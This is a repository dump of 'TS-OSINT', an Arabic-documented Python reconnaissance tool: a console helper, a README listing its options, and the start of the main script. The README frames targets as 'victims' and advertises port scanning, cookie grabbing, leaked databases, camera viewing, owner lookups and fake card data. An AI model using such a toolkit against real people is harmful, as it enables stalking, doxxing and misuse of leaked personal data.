isinstance(text, unicode): 122 | text = str(text).decode('utf-8') 123 | remaining = len(text) 124 | while remaining: 125 | n = DWORD(0) 126 | # There is a shorter-than-documented limitation on the 127 | # length of the string passed to WriteConsoleW (see 128 | # . 129 | retval = WriteConsoleW(self._hConsole, text, min(remaining, 10000), byref(n), None) 130 | if retval == 0 or n.value == 0: 131 | raise IOError("WriteConsoleW returned %r, n.value = %r" % (retval, n.value)) 132 | remaining -= n.value 133 | if not remaining: 134 | break 135 | text = text[n.value:] 136 | except Exception as e: 137 | _complain("%s.write: %r" % (self.name, e)) 138 | raise 139 | 140 | def writelines(self, lines): 141 | try: 142 | for line in lines: 143 | self.write(line) 144 | except Exception as e: 145 | _complain("%s.writelines: %r" % (self.name, e)) 146 | raise 147 | 148 | if real_stdout: 149 | sys.stdout = UnicodeOutput(hStdout, None, STDOUT_FILENO, '') 150 | else: 151 | sys.stdout = UnicodeOutput(None, sys.stdout, old_stdout_fileno, '') 152 | 153 | if real_stderr: 154 | sys.stderr = UnicodeOutput(hStderr, None, STDERR_FILENO, '') 155 | else: 156 | sys.stderr = UnicodeOutput(None, sys.stderr, old_stderr_fileno, '') 157 | except Exception as e: 158 | _complain("exception %r while fixing up sys.stdout and sys.stderr" % (e,)) 159 | 160 | 161 | # While we're at it, let's unmangle the command-line arguments: 162 | 163 | # This works around . 164 | GetCommandLineW = WINFUNCTYPE(LPWSTR)(("GetCommandLineW", windll.kernel32)) 165 | CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(("CommandLineToArgvW", windll.shell32)) 166 | 167 | argc = c_int(0) 168 | argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc)) 169 | 170 | argv = [argv_unicode[i].encode('utf-8') for i in xrange(0, argc.value)] 171 | 172 | if not hasattr(sys, 'frozen'): 173 | # If this is an executable produced by py2exe or bbfreeze, then it will 174 | # have been invoked directly. Otherwise, unicode_argv[0] is the Python 175 | # interpreter, so skip that. 176 | argv = argv[1:] 177 | 178 | # Also skip option arguments to the Python interpreter. 179 | while len(argv) > 0: 180 | arg = argv[0] 181 | if not arg.startswith(u"-") or arg == u"-": 182 | break 183 | argv = argv[1:] 184 | if arg == u'-m': 185 | # sys.argv[0] should really be the absolute path of the module source, 186 | # but never mind 187 | break 188 | if arg == u'-c': 189 | argv[0] = u'-c' 190 | break 191 | 192 | # if you like: 193 | sys.argv = argv 194 | 195 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TS-OSINT (TLER AL-SHAHRANI-OSINT) 2 | ## أداة تطبيق مفهوم الـOSINT 3 | ###### OSINT = Open-Source Intelligence | استخبارات مفتوحة المصدر 4 | 5 | 6 | 7 | ### تثبيت المكاتب 8 | ``` 9 | pip install requests praw ipaddress psutil pillow opencv-python selenium rich phonenumbers bs4 telethon googlesearch-python tabulate 10 | ``` 11 | 12 | ### أوامر التثبيت (Linux, Termux, iSH)، بالنسبة للـWindows توجد نسخة .exe 13 | ``` 14 | sudo git clone https://github.com/tlersa/TS-OSINT.git 15 | cd TS-OSINT/ 16 | sudo python3 TS-OSINT.py 17 | ``` 18 | 19 | ### [نسخة .exe للـWindows](https://t.me/tler_sa/167) 20 | 21 | ### المميزات 22 | - مجانية ومفتوحة المصدر ✔️ 23 | - سهولة الاستخدام وتعدد الخيارات لراحة المستخدم ✔️ 24 | - إذا لم تكن مثبت المكاتب المطلوبة سيتم تثبيتها تلقائيا ✔️ 25 | - المصداقية والدقة بالمعلومات المستخرجة بنسبة 💯✔️ 26 | - تعمل على كل الأنظمة ✔️ 27 | - بالخيار 1 يتم البحث عن الضحية في Google, Bing, Brave ✔️ 28 | - بالخيار 1 يمكنك تحديد عدد الصفحات المراد البحث فيها ✔️ 29 | - بالخيار 1 و10 و14 يتم حفظ نتائج البحث في ملف نصي وذلك لتحليل النتائج، وأيضا الثاني ولكن اختياري ✔️ 30 | - بالخيار 2 يتم البحث عن اسم المستخدم لحسابات الضحية في 62 منصة تواصل اجتماعي محلية وعالمية ✔️ 31 | - بالخيار 2 سرعة البحث عن اسم المستخدم لحسابات الضحية هو 0.5ث لكل منصة ✔️ 32 | - بالخيار 11 يمكنك تحديد عدد المنافذ المراد فحصها ✔️ 33 | - بالخيار 11 سرعة فحص المنافذ فحص 100 منفذ بنفس الوقت ✔️ 34 | - إمكانية تحديث الأداة بسهولة ✔️ 35 | ### الخيارات 36 | - الخيار 1 : مفهوم Google Dorks 37 | - الخيار 2 : يبحث عن اسم المستخدم المراد البحث عنه في 61 منصة تواصل اجتماعي محلية وعالمية 38 | - الخيار 3 : يستخرج معلومات المستخدمين الآتية لمنصات التواصل الآتية 39 | - منصة Instagram 40 | - معرّف المستخدم 41 | - هل هو حساب أعمال؟ 42 | - هل الحساب موثق بالعلامة الزرقاء؟ 43 | - هل الحساب خاص؟ 44 | - اسم المستخدم 45 | - كنية المستخدم 46 | - صورة الحساب 47 | - عدد المتابعين 48 | - عدد الذين يتابعهم 49 | - عدد المشاهدين الذين يتابعهم 50 | - عدد المشاهدين 51 | - عدد المنشورات 52 | - هل هو ناشر قصص عامة؟ 53 | - هل لديه قصص حاليا؟ 54 | - هل لديه قصص مثبتة؟ 55 | - عدد فيديوهات الـIGTV 56 | - وصف الحساب 57 | - روابط الوصف 58 | - هل لديه طلبات للمشاهدين؟ 59 | - هل لديه طلبات من المشاهدين؟ 60 | - منصة Telegram 61 | - اسم المستخدم 62 | - معرف المستخدم 63 | - الاسم الأول 64 | - الاسم الأخير 65 | - الرقم 66 | - منصة TikTok 67 | - اسم المستخدم 68 | - كنية المستخدم 69 | - معرّف المستخدم 70 | - معرّف المستخدم الثاني 71 | - هل الحساب موثق بالعلامة الزرقاء؟ 72 | - هل الحساب خاص؟ 73 | - موقع الحساب 74 | - عدد المتابعين 75 | - عدد الذين يتابعهم 76 | - هل المستخدم يسمح برؤية الآخرين للذين يتابعهم؟ 77 | - عدد المنشورات 78 | - عدد الإعجابات الإجمالي 79 | - هل الحساب يسمح برؤية الآخرين للمنشورات المحفوظة؟ 80 | - لغة الحساب 81 | - تاريخ إنشاء الحساب بالسنة والشهر 82 | - تاريخ آخر تغيير للكنية 83 | - منصة Github 84 | - اسم المستخدم 85 | - كنية المستخدم 86 | - نوع الحساب 87 | - رابط الحساب 88 | - معرّف الحساب 89 | - الشركة 90 | - الوصف 91 | - البريد الإلكرتوني العام 92 | - روابط الوصف 93 | - رابط حساب X المرتبط 94 | - صورة الحساب 95 | - موقع الحساب 96 | - عدد المتابعين 97 | - عدد الذين يتابعهم 98 | - المستودعات العامة 99 | - الـgits العامة 100 | - تاريخ إنشاء الحساب 101 | - الـHireable 102 | - آخر تحديث للحساب 103 | - منصة Reddit 104 | - اسم المستخدم 105 | - كنية المستخدم 106 | - معرّف المستخدم 107 | - صورة الحساب 108 | - الوصف 109 | - روابط الوصف 110 | - البريد الإلكتروني العام 111 | - الرقم العام 112 | - تاريخ إنشاء الحساب 113 | - منصة Tellonym 114 | - اسم المستخدم 115 | - كنية المستخدم 116 | - معرّف المستخدم 117 | - الوصف 118 | - صورة الحساب 119 | - موقع الحساب 120 | - عدد المتابعين 121 | - عدد المتابعين الحقيقين 122 | - عدد المتابعين الغير معروفين 123 | - عدد الذين يتابعهم 124 | - عدد التيل 125 | - عدد الأسئلة 126 | - عدد الإعجابات الإجمالية 127 | - هل الحساب موثق؟ 128 | - هل الحساب يستطيع التعليق؟ 129 | - هل الحساب متصل الآن؟ 130 | - منصة Sony 131 | - الخيار 1 و2 و3 : جلب معلومات الآتية لحسابك ماعدا من الجوائز إلى المحظورين بالخيار 2 و3 132 | - المعرّف 133 | - اسم المستخدم 134 | - كنية المستخدم 135 | - جهاز PlayStation 136 | - معرّف الجهاز 137 | - نوع الجهاز 138 | - تاريخ أول اتصال بالجهاز 139 | - صورة الحساب 140 | - هل يملك اشتراك بلس؟ 141 | - الجوائز 142 | - قائمة الأصدقاء 143 | - قائمة المحظورين 144 | - الخيار 4 : استخراج المعلومات الآتية لأي موقع بواسطة الـIP او الـDomain الخاص به 145 | - الـURL 146 | - الـIP 147 | - الـIP بصيغة Binary 148 | - الـIP بصيغة Hex 149 | - إصدار الـIP 150 | - مزود حدمة الإنرنت 151 | - الـFQDN 152 | - الـAsn 153 | - حالة الموقع 154 | - القارة 155 | - رمز القارة 156 | - الدولة 157 | - رمز الدولة 158 | - موقع الموقع 159 | - اسم منطقة الموقع 160 | - المدينة 161 | - المنطقة/المقاطعة/الحي/الدائرة/المحافظة/القضاء/الجزئية/الإقليم/المديرية/القسم 162 | - الرمز البريدي 163 | - العملة 164 | - خطوط الطول 165 | - خطوط العرض 166 | - الـOffset 167 | - الهاتف 168 | - الـProxy 169 | - مكان الاستضافة 170 | - الخيار 5 : ينقسم لقسمين : 171 | - القسم الأول : استخراج معلومات الـIP الآتية للضحية بواسطة الـIP الخاص به 172 | - الـIP 173 | - إصدار الـIP 174 | - الـIP بصيغة Binary 175 | - الـIP بصيغة Hex 176 | - مزود خدمة الانرنت 177 | - الدولة 178 | - المنطقة 179 | - المدينة 180 | - الرمز البريدي 181 | - خطوط الطول 182 | - خطوط العرض 183 | - القسم الثاني : استخراج المعلومات الآتية لجهاز مستخدم الأداة 184 | - نظام التشغيل 185 | - نسخة نظام التشغيل 186 | - البت وبيئة التثبيت 187 | - عدد النواة الإجمالي والمادي 188 | - الحد الأقصى والأدنى والتردد الحالي 189 | - نموذج عن استخدام المعالج 190 | - مساحة التخزين الإجمالية والمستخدمة والفارغة 191 | - اسم استضافة الجهاز بالشبكة 192 | - الـIP 193 | - إصدار الـIP 194 | - الـIP بصيغة Binary 195 | - الـIP بصيغة Hex 196 | - الـIPV6 197 | - الخيار 6 : ينقسم لـ3 أقسام : 198 | - القسم الأول : استخراج معلومات تفصيلية عن الشبكات المتصلة بالجهاز حاليا 199 | - القسم الثاني : استخراج العمليات الشبكية الجارية 200 | - القسم الثالث : جلب موقع الشبكة وإمكانية إظهار موقعها بخرائط Google 201 | - الخيار 7 : استخراج المعلومات الآتية للصور 202 | - اسم الجهاز الذي صور الصورة 203 | - تشفير الصورة 204 | - الـExifOffset 205 | - الـSubsecTimeOriginal 206 | - تاريخ التقاط الصورة بالسنة والشهر واليوم والساعة والدقيقة والثانية وأجزاء الثانية 207 | - فئة الصورة 208 | - المدينة الطبيعية 209 | - نوع الصورة 210 | - القارة 211 | - الدولة 212 | - رمز الدولة 213 | - المقاطع 214 | - رمز المقاطعة 215 | - الاتحاد السياسي 216 | - السكك الحديدية 217 | - الطريق 218 | - الولاية 219 | - القرية 220 | - الطريق السريع 221 | - رابط موقع تصوير الصورة بخرائط Google 222 | - الخيار 8 : ينقسم لقسمين : 223 | - القسم الأول : استخراج المعلومات الآتية لأرقام الهاتف العالمية 224 | - موقع الرقم 225 | - المنطقة الزمنية 226 | - شركة الاتصالات 227 | - القسم الثاني : البحث عن المعلومات الآتية عبر إدخال اسم الشخص، هذا الخيار متوفر لكل دول العالم 228 | - رقم الهاتف 229 | - اسم الشخص 230 | - رمز الدولة 231 | - عنوان الشخص 232 | - الخيار 9 : استخراج منصات التواصل الاجتماعي المسجل بها البريد الإلكتروني للضحية، حاليا توجد 3 منصات 233 | - الخيار 10 : محرك بحث Google، تستطيع البحث عن أي شيء تريده وتحديد عدد نتائج البحث 234 | - الخيار 11 : فحص منافذ جهاز الضحية واستخراج المفتوحة منها 235 | - الخيار 12 : أشهر محركات بحث Deep & Dark Web 236 | - الخيار 13 : ينقسم لقسمين 237 | - القسم الأول : مراقبة كاميرات 94 دولة حول العالم 238 | - القسم الثاني : مراقبة كاميرات متواجدة بـ53 مكان حول العالم 239 | - الخيار 14 : تطبيق مفهوم الـWebScraping (استخراج محتويات الموقع مثل المسارات والملفات والصور إلخ...) 240 | - الخيار 15 : جلب ملفات الكوكيز للمستخدمين بمواقع بروتوكول Http 241 | - الخيار 16 : قواعد بيانات إسرائيلية مسربة 242 | - الخيار 17 : التحقق من إذا كانت كلمة سرك مسربة أو لا 243 | - الخيار 18 : فحص المواقع الإلكترونية عن الثغرات، ويتم الفحص عن 16 ثغرة 244 | - الخيار 19 : جلب عنوان الـMac لجهاز المستخدم 245 | - الخيار 20 : التحقق من تسرب البطاقة البنكية للمستخدم 246 | - الخيار 21 : فحص الروابط من البرمجيات الخبيثة 247 | - الخيار 22 : إنشاء المعلومات الشخصية ااوهمية الآتية مع إمكانية تحديد اللغة والدولة وتتوفر حاليا أغلب اللغات ودول العالم 248 | - الاسم 249 | - العمر 250 | - تاريخ المبلاد 251 | - عنوان السكن 252 | - رقم الهاتف 253 | - البريد الإلكتروني 254 | - نوع الهاتف 255 | - الحالة الاجتماعية 256 | - الوظيفة إذا كان موظف 257 | - الشركة إذا كان موظف 258 | - الـIPv4 العام 259 | - الـIPv4 الخاص 260 | - الـIPv6 261 | - عنوان الـMac 262 | - عنوان بطاقة الشبكة (NIC) 263 | - الـBBAN 264 | - الـIBAM 265 | - جهة البطاقة البنكية 266 | - رقم البطاقة البنكية 267 | - رمز الآمان للبطاقة البنكية 268 | - تاربخ انتهاء البطاقة البنكية 269 | - رقم الـSwift للبنك 270 | - الرصيد المالي 271 | - رقم جواز السفر 272 | - تاريخ جواز السفر 273 | - اسم السيارة ولونها 274 | - رقم لوحة السيارة 275 | - رقم هيكل السيارة 276 | - اللون المفضل 277 | - الطعام المفضل 278 | - الخيار 23 : ادخال كلمة مفتاحية لإنشاء هاشتاقات منها، تفيد صنَّاع المحتوى 279 | - الخيار 24 : استخراج لوحات تسجيل الدخول من المواقع الإلكترونية 280 | - الخيار 25 : استخراج معلومات السيارة ومالكها باسم اللوحة، وهذا الخيار متوفر للدول الآتية : 🇮🇱 281 | - الخيار 97 : تحديث الأداة 282 | - الخيار 98 : الإبلاغ عن ثغرة بالأداة 283 | - الخيار 99 : طلب مساعدة 284 | - الخيار 00 : الخروج من الأداة 285 | 286 | ### ملاحظات ⚠️ 287 | - الخيار 3 منصة Telegram ستحتاج لمعرّف الـAPI والـAPI hash وهذه تحصل عليها من [هنا](https://my.telegram.org/apps) 288 | - الخيار 3 منصة Telegram سيتم إنشاء ملف اسمه session_name.session لا عليك منه 289 | - الخيار 3 منصة Reddit ستحتاج للـClient ID والـClient secert والـUser agent وهذه تحصل عليها من [هنا](https://www.reddit.com/prefs/apps/) 290 | - الخيار 3 منصة Tellonym لا يعمل على الهواتف 291 | - الخيار 3 منصة Sony ستحتاج لـNpsso وهذا تحصل عليه بعد تسجيل الدخول بالموقع الرسمي للمنصة ثم الدخول [هنا](https://ca.account.sony.com/api/v1/ssocookie) 292 | - الخيار 6 القسم الثالث يجب أن تسجل دخول بهذا [الموقع](https://www.mylnikov.org/) 293 | - الخيار 7 يجب أن تحدد الصور المصورة من الكاميرا مباشرة فقط 294 | - الخيار 7 قد تكون المعلومات من (تاريخ التقاط الصورة...~رابط موقع تصوير...) غير دقيقة/صحيحة وهذا بسبب محتوى الصورة أولا وثانيا من المكتبة PIL المستخدمة 295 | - الخيار 10 سيتم إنشاء ملف اسمه .google-cookie لا عليك منه 296 | - الخيار 14 اسم المجلد هو Downloaded images 297 | -------------------------------------------------------------------------------- /TS-OSINT.py: -------------------------------------------------------------------------------- 1 | try: 2 | import os, requests, instaloader, urllib.parse, json, time, sys, praw, socket, ipaddress, platform, psutil, subprocess, shutil, PIL.Image, PIL.ExifTags, cv2, pycountry, concurrent.futures, hashlib, faker, random, numpy 3 | from instaloader import Instaloader 4 | from rich.console import Console; from rich.table import Table 5 | from telethon.sync import TelegramClient 6 | from datetime import datetime 7 | from selenium.webdriver.chrome.options import Options; from selenium.webdriver.common.by import By; from selenium import webdriver 8 | from psnawp_api import PSNAWP 9 | from binascii import hexlify 10 | from PIL import Image; from PIL.ExifTags import TAGS, GPSTAGS 11 | import phonenumbers; from phonenumbers import geocoder, carrier, timezone 12 | from TrackCobra import Valid 13 | from googlesearch import search 14 | from search_engines import Google, Bing, Brave 15 | from bs4 import BeautifulSoup 16 | from http.cookiejar import CookieJar 17 | from tabulate import tabulate 18 | from io import BytesIO 19 | except ModuleNotFoundError: 20 | os.system("pip install requests praw ipaddress psutil pillow opencv-python selenium rich phonenumbers bs4 telethon TrackCobra googlesearch-python tabulate") 21 | 22 | os.system("clear") 23 | 24 | Black = "\033[1;30m" 25 | Red = "\033[1;31m" 26 | Green = "\033[1;32m" 27 | Yellow = "\033[1;33m" 28 | Blue = "\033[1;34m" 29 | Purple = "\033[1;35m" 30 | Cyan = "\033[1;36m" 31 | White = "\033[1;37m" 32 | Gray = "\033[1;39m" 33 | DarkRed = "\033[2;31m" 34 | DarkBlue = "\033[2;34m" 35 | DarkPink = "\033[2;35m" 36 | DarkCyan = "\033[2;36m" 37 | 38 | print(f"""{Blue} 39 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢢⠀⠀⠀⢢⠀⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 40 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡀⠀⢣⡀⠀⠀⠀⢣⢀⠀⠘⡆⢸⡀⠀⢢⠀⠀⠀⢠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 41 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢄⠑⣄⠀⢻⠀⠀⠀⠘⡌⡆⠀⡇⢸⡇⠀⢸⡀⡆⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀ 42 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⠼⣷⠼⡦⣼⣯⣧⣀⢰⡇⡇⢰⠇⣼⢳⠀⢸⡇⡇⠀⢸⡇⠀⡄⠀⢰⠀⠀⠀⠀⠀ 43 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⠿⠛⢉⡈⢧⡀⣸⡆⣇⣿⠃⣿⢀⣿⣻⢷⣿⣴⣇⡿⢀⣾⢠⡇⢀⣿⠀⢰⠃⠀⡜⠀⠀⠀⠀⠀ 44 | ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⡿⠋⢡⡀⠙⣦⠹⣎⣧⣿⣿⣿⣿⣼⣿⣿⣿⣿⣿⣾⣿⣿⣳⣿⣧⡿⣠⣾⡿⢀⢎⠀⡼⢁⠂⠀⡐⠀⠀ 45 | ⠀⠀⠀⠀⠀⠀⢀⣴⠟⠉⠀⠀⢠⠹⣿⣾⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣿⣵⡷⣫⣾⠞⣡⠏⣠⡞⠀⣠⡆ 46 | ⠀⠀⠀⠀⠀⣠⡿⠋⠀⠀⠠⣱⣄⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣾⣷⣾⣯⣶⣿⡿⠃ 47 | ⠀⠀⠀⠀⣴⠟⠁⠀⢤⡱⣄⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⣿⣿⡿⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠉⠀⠀ 48 | ⠀⠀⠀⣼⠋⠀⠀⣝⢦⣿⣿⣿⣿⣿⣿⣿⠿⢿⣿⣿⣿⣿⣷⣂⡙⣿⣿⡇⠀⠀⠀⠀⠀⠈⢉⣿⣿⣿⣿⣿⣿⠿⢿⣄⠀⠀⠀⠀⠀ 49 | ⠀⠀⣼⠃⠀⠀⠤⣬⣿⣿⣿⣿⣿⡉⣿⣿⣄⣼⣿⣿⣿⣿⡟⠉⠀⢿⣿⡿⠀⠀⠀⠀⠀⢠⣾⣿⠿⠿⠿⠿⣟⡳⠄⠉⠀⠀⠀⠀⠀ 50 | ⠀⣸⠃⠀⠀⢀⣾⣿⣿⠟⠋⢿⣥⡬⠙⣿⣿⣿⣿⣿⣿⡧⠀⠀⢲⣄⣿⠇⠀⠀⠀⢀⣴⣿⣿⣿⡿⣛⣓⠲⢤⡉⠀⠀⠀⠀⠀⠀⠀ 51 | ⢰⠃⠀⠀⣠⣿⣿⠟⠁⠀⠀⠘⢿⣔⣢⡴⠛⠙⠛⠛⢁⠀⢠⣾⣦⣿⠏⠀⠀⢀⣴⣿⣿⣿⣯⡭⢍⡒⢌⠙⠦⡈⢢⡀⠀⠀⠀⠀⠀ 52 | ⠁⠀⠀⣰⣿⡿⠁⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣄⣴⣷⣾⣷⣤⣿⠟⠁⠀⣠⣴⣿⣿⣿⣿⣾⣍⡻⡄⠈⠳⡅⠀⠈⠂⠀⠀⠀⠀⠀⠀ 53 | ⠀⠀⣼⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠛⠛⠉⠉⣀⣠⣶⣿⣿⣿⣿⣿⡿⢿⣿⣮⠙⢦⠀⠀⠈⠆⠀⠀⠀⠀⠀⠀⠀⠀ 54 | ⠀⣸⠟⠁⠀⢀⣠⣤⣶⡶⢶⣶⣶⣦⣤⣤⣤⣤⣤⣶⣶⣾⣿⣿⣿⡿⢿⡿⣝⢫⡻⣍⠳⣝⢻⢧⠀⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 55 | ⣰⠋⢀⣴⠞⠋⠉⠠⠋⠠⢋⠞⣹⢻⠏⢸⠉⡏⡿⢹⢿⢻⣿⢿⣿⡿⣦⠹⡈⠳⡘⡈⢣⠘⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 56 | ⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠈⠀⠃⠀⠀⠘⠀⠀⡇⡜⠈⡸⢸⠀⢹⢸⠈⢆⠁⠀⢱⠁⠀⢇⠸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 57 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠘⠀⠘⠀⠀⢸⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 58 | 59 | {Green}v5.1.6{White} 60 | 61 | THIS TOOL WAS PROGRAMMED BY TLER AL-SHAHRANI. 62 | PERSONAL WEBSITE : {Blue}https://tlersa.github.io/tleralshahrani/Index.html""") 63 | print(f"{White}- "*50) 64 | 65 | def main_menu(): 66 | print(f"""{White}[{Blue}01{White}] - Dorks [{Blue}11{White}] - Ports Scan [{Blue}21{White}] - Scan Links For Malwares 67 | [{Blue}02{White}] - Search For Username [{Blue}12{White}] - Deep & Dark Web [{Blue}22{White}] - Create Fake Personal Info 68 | [{Blue}03{White}] - Usernames OSINT [{Blue}13{White}] - CCTV [{Blue}23{White}] - Create Hashtags 69 | [{Blue}04{White}] - Domains OSINT [{Blue}14{White}] - WebScraping [{Blue}24{White}] - Extract Login Panels 70 | [{Blue}05{White}] - IP's OSINT [{Blue}15{White}] - Get Http Cookies [{Blue}25{White}] - Cars OSINT 71 | [{Blue}06{White}] - Networks OSINT [{Blue}16{White}] - Israeli Databases \U0001F923 72 | [{Blue}07{White}] - MetaData [{Blue}17{White}] - Check Passwords Leakage 73 | [{Blue}08{White}] - PhoneNumbers OSINT [{Blue}18{White}] - Scan Websites For Bugs 74 | [{Blue}09{White}] - Emails OSINT [{Blue}19{White}] - Get MacAddress 75 | [{Blue}10{White}] - Search Engine [{Blue}20{White}] - Bank Cards OSINT 76 | 77 | [{Blue}97{White}] - Update 78 | [{Blue}98{White}] - Report A Bug 79 | [{Blue}99{White}] - Help 80 | [{Blue}00{White}] - Exit""") 81 | 82 | def submenu1(): 83 | print(f"""{White}[{Blue}01{White}] - Instagram 84 | [{Blue}02{White}] - Telegram Accs 85 | [{Blue}03{White}] - TikTok 86 | [{Blue}04{White}] - Github 87 | [{Blue}05{White}] - Reddit 88 | [{Blue}06{White}] - Tellonym 89 | [{Blue}07{White}] - Sony 90 | 91 | [{Blue}99{White}] - Back""") 92 | 93 | def submenu2(): 94 | print(f"""{White}[{Blue}01{White}] - PhoneNumbers OSINT 95 | [{Blue}02{White}] - Search For The Owner Of The PhoneNumber By Name 96 | 97 | [{Blue}99{White}] - Back""") 98 | 99 | def submenu3(): 100 | print(f"""{White}[{Blue}01{White}] - Networks OSINT 101 | [{Blue}02{White}] - Show Network Operations 102 | [{Blue}03{White}] - Extract The Location 103 | 104 | [{Blue}99{White}] - Back""") 105 | 106 | def submenu4(): 107 | print(f"""{White}[{Blue}01{White}] - Cameras Around The World 108 | [{Blue}02{White}] - Cameras Of Places 109 | 110 | [{Blue}99{White}] - Back""") 111 | 112 | def submenu5(): 113 | print(f"""{White}[{Blue}01{White}] - My acc info 114 | [{Blue}02{White}] - Osint for user by username 115 | [{Blue}03{White}] - Osint for user by userID 116 | 117 | [{Blue}99{White}] - Back""") 118 | 119 | def handle_selection(selection): 120 | def another_operation(): 121 | ao = input(f"\n{White}Would u like another operation? ({Blue}Y{White}/{Blue}N{White}) {Blue}") 122 | if ao == "Y" or ao == "y" or ao == "Yes" or ao == "yes" or ao == "YES": main_menu() 123 | elif ao == "N" or ao == "n" or ao == "No" or ao == "no" or ao == "No": exit(f"{White}") 124 | else: print(f"{Red}Please choose a correct option!{White}") 125 | 126 | if selection == "1" or selection == "01" or selection == "Dorks" or selection == "DORKS" or selection == "dorks": 127 | class dorks(): 128 | def __init__(self): 129 | self.fristname = None 130 | self.FName = None 131 | self.GFName = None 132 | self.lastname = None 133 | self.output = "" 134 | self.admin() 135 | 136 | def set_info(self): 137 | fristname = input(f"{White}[{Blue}+{White}] FristName/Nickname : {Blue}") 138 | FName = input(f"{White}[{Blue}+{White}] Father name : {Blue}") 139 | GFName = input(f"{White}[{Blue}+{White}] GrandFather name : {Blue}") 140 | lastname = input(f"{White}[{Blue}+{White}] Last/Family/Tribe name : {Blue}") 141 | 142 | if fristname == "" or fristname == " ": self.fristname = False 143 | else: self.fristname = fristname 144 | 145 | if FName == "" or FName == " ": self.FName = False 146 | else: self.FName = FName 147 | 148 | if GFName == "" or GFName == " ": self.GFName = False 149 | else: self.GFName = GFName 150 | 151 | if lastname == "" or lastname == " ": self.lastname = False 152 | else: self.lastname = lastname 153 | 154 | if self.FName and self.fristname and self.GFName and self.lastname is None: 155 | input(f"{Red}Please add at least fristname!{White}") 156 | exit() 157 | 158 | def admin(self): 159 | self.set_info() 160 | print(f"\n{White}[ Searching in internet browsers... ]") 161 | space = " " 162 | time.sleep(3) 163 | 164 | if self.fristname: 165 | sql = self.fristname + space 166 | self.search_google(sql) 167 | self.search_bing(sql) 168 | self.search_brave(sql) 169 | 170 | if self.fristname and self.FName: 171 | sql = self.fristname + space + self.FName 172 | self.search_google(sql) 173 | self.search_bing(sql) 174 | self.search_brave(sql) 175 | 176 | if self.fristname and self.GFName: 177 | sql = self.fristname + space + self.GFName 178 | self.search_google(sql) 179 | self.search_bing(sql) 180 | self.search_brave(sql) 181 | 182 | if self.fristname and self.lastname: 183 | sql = self.fristname + space + self.lastname 184 | self.search_google(sql) 185 | self.search_bing(sql) 186 | self.search_brave(sql) 187 | 188 | if self.fristname and self.FName and self.lastname: 189 | sql = self.fristname + space + self.FName + space + self.lastname 190 | self.search_google(sql) 191 | self.search_bing(sql) 192 | self.search_brave(sql) 193 | 194 | if self.fristname and self.GFName and self.lastname: 195 | sql = self.fristname + space + self.GFName + space + self.lastname 196 | self.search_google(sql) 197 | self.search_bing(sql) 198 | self.search_brave(sql) 199 | 200 | if self.fristname and self.FName and self.GFName and self.lastname: 201 | sql = self.fristname + space + self.FName + space + self.GFName + space + self.lastname 202 | self.search_google(sql) 203 | self.search_bing(sql) 204 | self.search_brave(sql) 205 | 206 | self.save() 207 | 208 | def add_info(self, link, title, text, _from): self.output += f"""[-] Link : {link} 209 | [-] Title : {title} 210 | [-] Text : {text} 211 | [-] From : {_from}\n\n""" 212 | 213 | def search_google(self, sql): 214 | time.sleep(0.5) 215 | number_of_pages = int(input(f"{White}[{Blue}+{White}] How many pages you want to search in google? {Blue}")) 216 | engine = Google() 217 | results = engine.search(sql, pages=number_of_pages) 218 | seen = set() 219 | for data in results.__dict__['_results']: 220 | text = data['text'] 221 | if text not in seen: 222 | link = data['link'] 223 | title = data['title'] 224 | self.add_info(link, title, text, "Google") 225 | seen.add(text) 226 | print(f"{White}[{Green}✓{White}] Done Search in Google") 227 | 228 | def search_bing(self, sql): 229 | time.sleep(0.5) 230 | number_of_pages = int(input(f"{White}[{Blue}+{White}] How many pages you want to search in bing? {Blue}")) 231 | engine = Bing() 232 | results = engine.search(sql, pages=number_of_pages) 233 | seen = set() 234 | for data in results.__dict__['_results']: 235 | text = data['text'] 236 | if text not in seen: 237 | link = data['link'] 238 | title = data['title'] 239 | self.add_info(link, title, text, "Google") 240 | seen.add(text) 241 | print(f"{White}[{Green}✓{White}] Done Search in Bing") 242 | 243 | def search_brave(self, sql): 244 | time.sleep(0.5) 245 | number_of_pages = int(input(f"{White}[{Blue}+{White}] How many pages you want to search in brave? 